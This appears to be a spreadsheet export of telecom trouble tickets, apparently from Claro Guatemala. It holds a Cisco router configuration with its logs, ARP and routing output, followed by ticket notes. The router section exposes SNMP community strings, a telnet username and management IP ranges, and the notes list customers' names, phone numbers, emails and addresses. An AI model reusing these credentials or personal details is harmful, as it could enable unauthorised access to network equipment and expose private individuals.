 DESCRIPTION WAN PRINCIPAL /_/ID1025035SV/_/
 BANDWIDTH 51200
 IP ADDRESS 10.152.0.81 255.255.255.252
 NEGOTIATION AUTO
 SERVICE-POLICY INPUT SERVICIOS_50M
 SERVICE-POLICY OUTPUT SERVICIOS_50M
!
INTERFACE GIGABITETHERNET0/0/1
 NO IP ADDRESS
 SHUTDOWN
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
!
INTERFACE GIGABITETHERNET0/1/1
!
INTERFACE GIGABITETHERNET0/1/2
!
INTERFACE GIGABITETHERNET0/1/3
!
INTERFACE VLAN1
 DESCRIPTION RED LAN CLIENTE
 IP ADDRESS 201.247.108.118 255.255.255.248
!
IP FORWARD-PROTOCOL ND
IP TCP SYNWAIT-TIME 10
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.152.0.82
!
!
!
LOGGING SOURCE-INTERFACE LOOPBACK5
IP ACCESS-LIST STANDARD 88
 10 REMARK MONITOREO DE CLARO
 10 PERMIT 10.255.24.144 0.0.0.7
 20 PERMIT 190.148.15.192 0.0.0.15
IP ACCESS-LIST STANDARD 97
 10 REMARK SNMP_FILTER
 10 PERMIT 10.95.61.11
 20 PERMIT 10.95.61.15
 30 PERMIT 10.95.61.31
 40 PERMIT 201.247.246.11
 60 PERMIT 201.247.156.100
 50 PERMIT 201.247.156.93
IP ACCESS-LIST STANDARD 98
 10 REMARK TELNET_FILTER
 10 PERMIT 10.95.61.100
 50 PERMIT 201.247.153.253
 20 PERMIT 10.95.61.11
 30 PERMIT 10.95.60.250
 40 PERMIT 201.247.246.11
 60 PERMIT 168.243.136.20
!
!
SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
!
!
!
!
CONTROL-PLANE
!
BANNER LOGIN ^C
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
^C
!
LINE CON 0
 AUTHORIZATION EXEC CON_ACC
 LOGIN AUTHENTICATION CON_ACC
 TRANSPORT INPUT NONE
 STOPBITS 1
LINE VTY 0 4
 TRANSPORT INPUT ALL
!
SCHEDULER INTERVAL 500
NTP SERVER 201.247.152.233 PREFER
NTP SERVER 201.247.152.249
!
!
!
!
!
END
ID1025035#
LOG DEL ROUTER CPE:
SHOW LOG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109 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 111 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
U JUN 16 2022
*JUN 16 14:59:27.385 GMT: %SYS-6-LOGOUT: USER T3LN0CR3D3S HAS EXITED TTY SESSION 1(190.148.15.206)
*JUN 16 20:42:32.105 GMT: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: T3LN0CR3D3S] [SOURCE: 190.148.15.206] [LOCALPORT: 23] AT 20:42:32 GMT THU JUN 16 2022
*JUN 16 20:42:33.943 GMT: %SYS-6-LOGOUT: USER T3LN0CR3D3S HAS EXITED TTY SESSION 1(190.148.15.206)
*JUN 16 21:05:08.550 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 64.62.197.2 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 16 21:09:29.786 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 64.62.197.2 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 16 21:31:50.257 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 184.105.247.194 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 16 22:26:22.776 GMT: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 166.148.125.219
*JUN 16 23:26:21.987 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.226.160.170 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 16 23:26:41.334 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.152.141.51 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 03:01:00.572 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 192.241.219.100 - WRONG VERSION NUMBER
*JUN 17 06:44:22.836 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 192.241.212.89 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 06:44:34.809 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 192.241.212.89 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 07:49:09.130 GMT: %SSH-3-PACK_CORR_PAD: CORRUPTED PADLEN 0 ON INPUT
*JUN 17 07:54:35.166 GMT: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 61.177.173.35
*JUN 17 09:47:46.555 GMT: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 116.98.162.249
*JUN 17 09:48:49.589 GMT: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 116.98.162.249
*JUN 17 09:52:16.758 GMT: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 116.105.28.221
*JUN 17 10:34:00.733 GMT: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: T3LN0CR3D3S] [SOURCE: 190.148.15.206] [LOCALPORT: 23] AT 10:34:00 GMT FRI JUN 17 2022
*JUN 17 10:34:02.490 GMT: %SYS-6-LOGOUT: USER T3LN0CR3D3S HAS EXITED TTY SESSION 2(190.148.15.206)
*JUN 17 11:23:45.928 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 185.180.143.147 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 11:23:54.230 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 185.180.143.147 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 11:53:01.193 GMT: %SMART_LIC-4-RESERVE_IN_PROGRESS: NONE LICENSE RESERVATION PROCESS MUST BE COMPLETED WITH THE 'LICENSE SMART RESERVATION INSTALL' COMMAND. RESERVATION STARTED ON OCT 28 08:04:04 2021 GMT
*JUN 17 12:36:25.389 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 128.14.209.226 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 12:36:32.275 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 128.14.209.226 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 14:59:13.059 GMT: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: T3LN0CR3D3S] [SOURCE: 190.148.15.206] [LOCALPORT: 23] AT 14:59:13 GMT FRI JUN 17 2022
*JUN 17 14:59:13.612 GMT: %SYS-6-LOGOUT: USER T3LN0CR3D3S HAS EXITED TTY SESSION 1(190.148.15.206)
*JUN 17 23:49:20.274 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 71.6.165.200 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 23:49:32.250 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 71.6.165.200 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 23:50:56.934 GMT: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: T3LN0CR3D3S] [SOURCE: 10.152.0.82] [LOCALPORT: 23] AT 23:50:56 GMT FRI JUN 17 2022
ID1025035#
SHOW CLOCK
*23:51:13.439 GMT FRI JUN 17 2022
ID1025035#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.152.0.81             -   6887.C617.0D80  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.152.0.82             4   A4BE.2BE5.8BC7  ARPA   GIGABITETHERNET0/0/0
INTERNET  201.247.108.114        21   34E5.EC82.9E10  ARPA   VLAN1
INTERNET  201.247.108.115         0   INCOMPLETE      ARPA
INTERNET  201.247.108.116         3   3C61.04E3.8040  ARPA   VLAN1
INTERNET  201.247.108.117        90   34E5.EC82.9E17  ARPA   VLAN1
INTERNET  201.247.108.118         -   6887.C617.0DF4  ARPA   VLAN1
ID1025035#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN PRINCIPAL /_/ID1025035SV/_/
GI0/0/1                        ADMIN DOWN     DOWN
GI0/1/0                        UP             UP
GI0/1/1                        DOWN           DOWN
GI0/1/2                        DOWN           DOWN
GI0/1/3                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       RED LAN CLIENTE
ID1025035#
SHOW IP INT BRIEF
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.152.0.81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166.34.118   YES NVRAM  UP                    UP
VLAN1                  201.247.108.118 YES NVRAM  UP                    UP
ID1025035#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_ID_ESV 10.152.0.81
  PING 10.152.0.81: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.152.0.81 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.30.4
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_ID_ESV 10.152.0.81
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_ID_ESV
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.152.0.81/32  DIRECT  0    0                 0.0.0.0         VLANIF1188			</t>
  </si>
  <si>
    <t>DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 18 DE JUNIO DE 2022 0:04
PARA: K.VELAZQUEZ@-SWISSTEXES.COM &lt;K.VELAZQUEZ@-SWISSTEXES.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
ASUNTO: SEGUIMIENTO AL TTK SD1136147
ESTIMADO CLIENTE EL MOTIVO DEL CORREO ES PARA BRINDARLE EL MEJOR SEGUIMIENTO EL ENLACE .
*JUN 16 23:26:41.334 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.152.141.51 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 03:01:00.572 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 192.241.219.100 - WRONG VERSION NUMBER
*JUN 17 06:44:22.836 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 192.241.212.89 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 06:44:34.809 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 192.241.212.89 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 07:49:09.130 GMT: %SSH-3-PACK_CORR_PAD: CORRUPTED PADLEN 0 ON INPUT
*JUN 17 07:54:35.166 GMT: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 61.177.173.35
*JUN 17 09:47:46.555 GMT: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 116.98.162.249
*JUN 17 09:48:49.589 GMT: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 116.98.162.249
*JUN 17 09:52:16.758 GMT: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 116.105.28.221
*JUN 17 10:34:00.733 GMT: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: T3LN0CR3D3S] [SOURCE: 190.148.15.206] [LOCALPORT: 23] AT 10:34:00 GMT FRI JUN 17 2022
*JUN 17 10:34:02.490 GMT: %SYS-6-LOGOUT: USER T3LN0CR3D3S HAS EXITED TTY SESSION 2(190.148.15.206)
*JUN 17 11:23:45.928 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 185.180.143.147 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 11:23:54.230 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 185.180.143.147 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 11:53:01.193 GMT: %SMART_LIC-4-RESERVE_IN_PROGRESS: NONE LICENSE RESERVATION PROCESS MUST BE COMPLETED WITH THE 'LICENSE SMART RESERVATION INSTALL' COMMAND. RESERVATION STARTED ON OCT 28 08:04:04 2021 GMT
*JUN 17 12:36:25.389 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 128.14.209.226 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 12:36:32.275 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 128.14.209.226 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 14:59:13.059 GMT: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: T3LN0CR3D3S] [SOURCE: 190.148.15.206] [LOCALPORT: 23] AT 14:59:13 GMT FRI JUN 17 2022
*JUN 17 14:59:13.612 GMT: %SYS-6-LOGOUT: USER T3LN0CR3D3S HAS EXITED TTY SESSION 1(190.148.15.206)
*JUN 17 23:49:20.274 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 71.6.165.200 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 23:49:32.250 GMT: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 71.6.165.200 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 17 23:50:56.934 GMT: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: T3LN0CR3D3S] [SOURCE: 10.152.0.82] [LOCALPORT: 23] AT 23:50:56 GMT FRI JUN 17 2022
ID1025035#
*23:51:13.439 GMT FRI JUN 17 2022
ID1025035#
 A ESPERA DE SUS VALIDACIONES</t>
  </si>
  <si>
    <t>F4606450</t>
  </si>
  <si>
    <t>SEGUN INFORMACION DE SERGIO DE BANCO AZTECA LOS EQUIPOS SE ENCUENTRA PROTEGIDOS, PROPORCIONA NUMEROS DE CONTACTO PARA QUE SE CONFIRME CON PUNTO REMOTO
265900396 // ALEX HERNANDEZ 56120022 - 37043551</t>
  </si>
  <si>
    <t>F4606515</t>
  </si>
  <si>
    <t>SE LLAMA DE NUEVO AL CLIENTE RAQUEL MAYORGA 72855508  EN DOS OCASIONES, NO SE TIENE RESPUESTA, SE INTENTARÁ EN BREVE. LLAMADAS DESDE VI-VO</t>
  </si>
  <si>
    <t>F4606518</t>
  </si>
  <si>
    <t>SE CUENTA CON REPORTE DE CORTE DE ENERGÍA PROGRAMADO POR PARTE DE LA EMPRESA ELECTRICA</t>
  </si>
  <si>
    <t>F4606522</t>
  </si>
  <si>
    <t>CLIENTE AUDENCIO MORAN 38393721 INDICA QUE TIENE CAIDO SU E1 Y SU SERVICIO DE INTERNET, CLIENTE UBICA EQUIPO HUAWEI ONT ALARMADO CON LED LOS EN ROJO, CLIENTE APOYA REINICIANDO EQUIPO PERO INCONVENIENTE PERSISTE, SE ABRIRÁ WO PARA LA REVISIÓN. ID: 3001900228</t>
  </si>
  <si>
    <t>LUEGO DEL REINICIO DE LA PBX, EL E1 RESTABLECE, SE REALIZAN PRUEBAS CON CLIENTE AUDENCIO MORAN 38393721 QUIEN VALIDA EL SERVICIO OPERATIVO, AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 3001946481, 3001950837</t>
  </si>
  <si>
    <t>F4606530</t>
  </si>
  <si>
    <t>SIN RESPUESTA POR PARTE DE CLIENTE////SE ENVIA CORREO NUEVAMENTE////QUEDAMOS A LA ESPERA
+</t>
  </si>
  <si>
    <t>F4606550</t>
  </si>
  <si>
    <t>SE ESTA EN LINEA CON EL CLIENTE CARLOS TOC 59183858  QUIEN PROCEDE A UBICAR EQUIPOS. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>F4606565</t>
  </si>
  <si>
    <t>SE HABLÓ CON OSCAR ESTRADA/CLIENTE 47190166 INDICA QUE HARÁ SUS PRUEBAS, PIDE SE VALIDE SERVICIO HASTA EL DÍA LUNES A LAS 11:00AM</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR ESTRADA 47190166 PARA SOLICITAR LOS DATOS DE LA VISITA TECNICA
-ID 1001156568
NOMBRE DEL CLIENTE: INVERSIONES LIBERTY S.A.
UBICACIÓN:2 AV. 16-44 ZONA 1
CONTACTO EN SITIO: OSCAR ESTRADA 47190166
HORARIO DE ATENCION:VISITA PARA MAÑANA A LAS 8:00 HRS
GESTIÓN DE PERMISOS: CLIENTE SOLICITA SE PUEDA CERTICAR EL SERVICIO Y LA FO (UNICAMENTE LLAMAR A CLIENTE 15 MIN ANTES PARA QUE EL ESTE ENTERADO)</t>
  </si>
  <si>
    <t>SE PLATICA CON CLIENTE QUIEN INDICA QUE SE CONTACTARA CON EJECUTIVO PARA PODER VER EL TEMA DE LA MIGRACIÓN DEL SERVICIO
1001433331
COLA:
NOMBRE: A: 47190166
NÚMERO: 47190166
DURACIÓN: 0:03:50
ESTADO: CONECTADA
DETALLES: 47190166
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 21/06/2022 12:54:22</t>
  </si>
  <si>
    <t>F4606579</t>
  </si>
  <si>
    <t>JOSE FUENTES 42187322  SE HABLA CON CLIENTE, QUIEN COMENTA QUE  YA RESPONDIO EL CORREO,  SE ESTA  SOLICITANDO APOYO PARA UBICAR LOS CORREOS,  SE ADJUTNA IMAGEN DE LA LLAMADA</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A DENIS SICA PARA QUE VALIDE TEMA DEL CIERRE DE AGENCIA, Y PROCEDER CON EL BLOQUEO DEL MONITOREO.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 21 DE JUNIO DE 2022 17:22PARA: DENIS SICA &lt;DSICA@GTC.COM.GT&gt;CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CCTELECOMUNICACIONES@GTC.COM.GT &lt;CCTELECOMUNICACIONES@GTC.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; JFUENTES@GTC.COM.GT &lt;JFUENTES@GTC.COM.GT&gt;; CCTELECOMUNICACIONES@GYTCONTINENTAL.COM.GT &lt;CCTELECOMUNICACIONES@GYTCONTINENTAL.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_GYT_GT_AGENCIA_162"
ESTIMADO DENIS,
TENEMOS ALARMA CON RESPECTO AL SERVICIO SOLICITAMOS SU APOYO PARA INDICAR ESTADO DE LA AGENCIA "CC_GYT_GT_AGENCIA_162" CON ID PRINCIPAL "7800419T"  SE HA LOGRADO COMUNICACIÓN CON PERSONAL DE GYT LOS CUALES INDICAN QUE AGENCIA HA CERRADO OPERACIONES POR LO CUAL SOLICITAMOS SU CONFIRMACIÓN POR ESTA VÍA ESTO PARA REALIZAR EL BLOQUEO DEL MONITOREO PROACTIVO DE CLARO, SE ADJUNTAN DATOS DE LA AGENCIA.
TICKET: F4606579
ID: 7800419T
IDENTIFICADOR DEL CLIENTE:  CC_GYT_GT_AGENCIA_162
UBICADO EN:  AVENIDA PETAPA 42-51 ZONA 12 INTERIOR WACKENHUT (600 MTS)
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE CONTACTO A CONTACTO DE TICKETS ANTERIORES || CONTESTO EX ENCARGADA DE TIENDA NO INDICA NOMBRE, COMENTA QUE LA AGENCIA HA CERRADO OPERACIONES, Y ELLA YA NO LABORA MAS EN LA AGENCIA.
1001510701
COLA:
NOMBRE: A: 35582570
NÚMERO: 35582570
DURACIÓN: 0:01:56
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 35582570
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 21/06/2022 17:02:53</t>
  </si>
  <si>
    <t>AUN NO SE TIENE RESPUESTA DE LA CENTRAL, SE TIENE CONTACTO JOSE FUENTES 42187322 IPINFRAESTRUCTURA@GTC.COM.GT POR LO QUE SE PROCEDE A ENVIAR CORREO A ESE CONTACTO
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE DE LA AGENCIA CC_GYT_GT_AGENCIA_162, SOLICITAMOS SU APOYO CONFIRMANDO BAJA DEL SERVICIO SEGUN SE INDICA EN CORREO ANTERIOR Y ASI PROCEDER CON EL RETIRO DE NUESTRO MONITOREO. QUEDO AL PENDIENTE.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4606585</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JONATHANA SE LE BRINDA REOTRALIMENTACION SOBRE EL INCIDNTE SE LE COMENTA QUE TIEMPO ESTIMADO DE REPARACION ES DE 2 HORAS
3001957663
COLA:
NOMBRE: A: 50587104541
NÚMERO: 50587104541
DURACIÓN: 0:02:28
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 50587104541
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 18/06/2022 13:04:14</t>
  </si>
  <si>
    <t>F4606650</t>
  </si>
  <si>
    <t>CLIENTE CARLOS MONTANO INDICA QUE TIENE RUIDO/ESTATICA EN ALGUNAS LLAMADAS, COMENTA QUE YA REINICIO LOS EQUIPOS Y SIGUE EL PROBLEMA. SOLICITA UNA REVISIÓN COMPLETA DEL E1 POR PARTE DE CLARO ANTES DE ENVIAR A REVISAR SU PBX, VISITA PARA EL DIA LUNES 20/06 A LAS 8 HORAS. PREGUNTAR POR EL CLIENTE PARA EL INGRESO LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>CLEINTE REPORTA RUIDO/ESTATICA EN ALGUNAS LLAMADAS
CAUSA RAIZ:. RUTA DE E1 OBSOLETA
SOLUCION: SE VERIFICO EN NODO SI SE TENIA PROBLEMAS DE RUIDO/ESTATICA EN ALGUNAS LLAMADAS Y SE CONFIRMA QUE EN LA RUTA DEL E1 EN NODO ES EL PROBLEMA, POR LO QUE SE MIGRA A CLIENTE HACIA MSAM Y TODO QUEDA OPERATIVO, SIN ERRORES, SIN RUIDO. FAVOR VALIDAR SD. ##SERVICIO MIGRADO EXITOSAMENTE#
##SE LLAMA A CLIENTE CARLOS MONTANO-76963351  ## VALIDA ##VIVO</t>
  </si>
  <si>
    <t>CLIENTE CLAUDIA MEARDI 77421251 VALIDA EL SERVICIO INDICA QUE YA TODO ESTA FUNCIONANDO CON NORMALIDAD.
1001284985
COLA:
NOMBRE: A: 0050377421251
NÚMERO: 0050377421251
DURACIÓN: 0:00:22
ESTADO: CONECTADA
DETALLES: 0050377421251
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 20/06/2022 16:51:06</t>
  </si>
  <si>
    <t>F4606659</t>
  </si>
  <si>
    <t>SEGUN INFORMACION DE SERGIO DE BANCO AZTECA LOS EQUIPOS SE ENCUENTRA PROTEGIDOS, PROPORCIONA NUMEROS DE CONTACTO PARA QUE SE CONFIRME CON PUNTO REMOTO
65900366 AGENCIA 3465 // ROSARIO RODRIGUEZ 55220408
JAVIER 58362639</t>
  </si>
  <si>
    <t>SE LLAMA A NUMERO DE TT ANTERIORES 53233062 FRANKLIN PERO INDICA QUE YA NO LABORA PARA BANZO AZTECA.
ID
1001313597
COLA:
NOMBRE: A: 53233062
NÚMERO: 011 50253233062
DURACIÓN: 0:00:42
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: +50253233062
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 20/06/2022 19:58:44</t>
  </si>
  <si>
    <t>SE LLAMA A NUMERO INDICADO ROSARIO RODRIGUEZ 55220408, PERO INFORMA QUE YA TIENE 2 AÑOS QUE NO TRABAJA AHI
ID
1001313174
COLA:
NOMBRE: A: 55220408
NÚMERO: 011 50255220408
DURACIÓN: 0:00:51
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: +50255220408
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 20/06/2022 19:51:47</t>
  </si>
  <si>
    <t>SE LLAMA A NUMERO INDICADO POR SERGIO EN SKYPE, SIN EMBARGO INDICA EQUIVOCADO, SE PREGUNTA POR JAVIER PERO INDICA QUE NO ES CORRECTO. SE LLAMARA AL OTRO NUMERO
ID
1001312934
COLA:
NOMBRE: A: 58362639
NÚMERO: 58362639
DURACIÓN: 0:01:29
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 58362639
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 20/06/2022 19:49:33</t>
  </si>
  <si>
    <t>SE COORDINA VISITA TÉCNICA A PR MAÑANA A LAS 08:00AM A SOLICITUD DE CLIENTE CENTRAL, PERSONAL DE OPERACIONES REGIÓN ENTERADOS.</t>
  </si>
  <si>
    <t>F4606711</t>
  </si>
  <si>
    <t>CASO ESCALADO CON PERSONAL DE INGENIERÍA PARA QUE NOS APOYEN CON EL DISEÑO, ÉSTOS NO LABORAN FINES DE SEMANA, SE DEBE DAR SEGUIMIENTO HASTA EL DÍA LUNES A PARTIR DE LAS 08:00AM</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO , ASÍ MISMO SE  SOLICITA APOYO PARA QUE SE COORDINE EL INGRESO AL CENTRO COMERCIAL
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 20 DE JUNIO DE 2022 13:59
PARA: SERVICEDESCK@CAMCO.COM.SV &lt;SERVICEDESCK@CAMCO.COM.SV&gt;; EDGA MEDINA &lt;EDGAR.MEDINA@REDOPTIMA.NET&gt;; FELIPE DEL AGUILA &lt;FELIPE.DELAGUILA@REDOPTIMA.NET&gt;
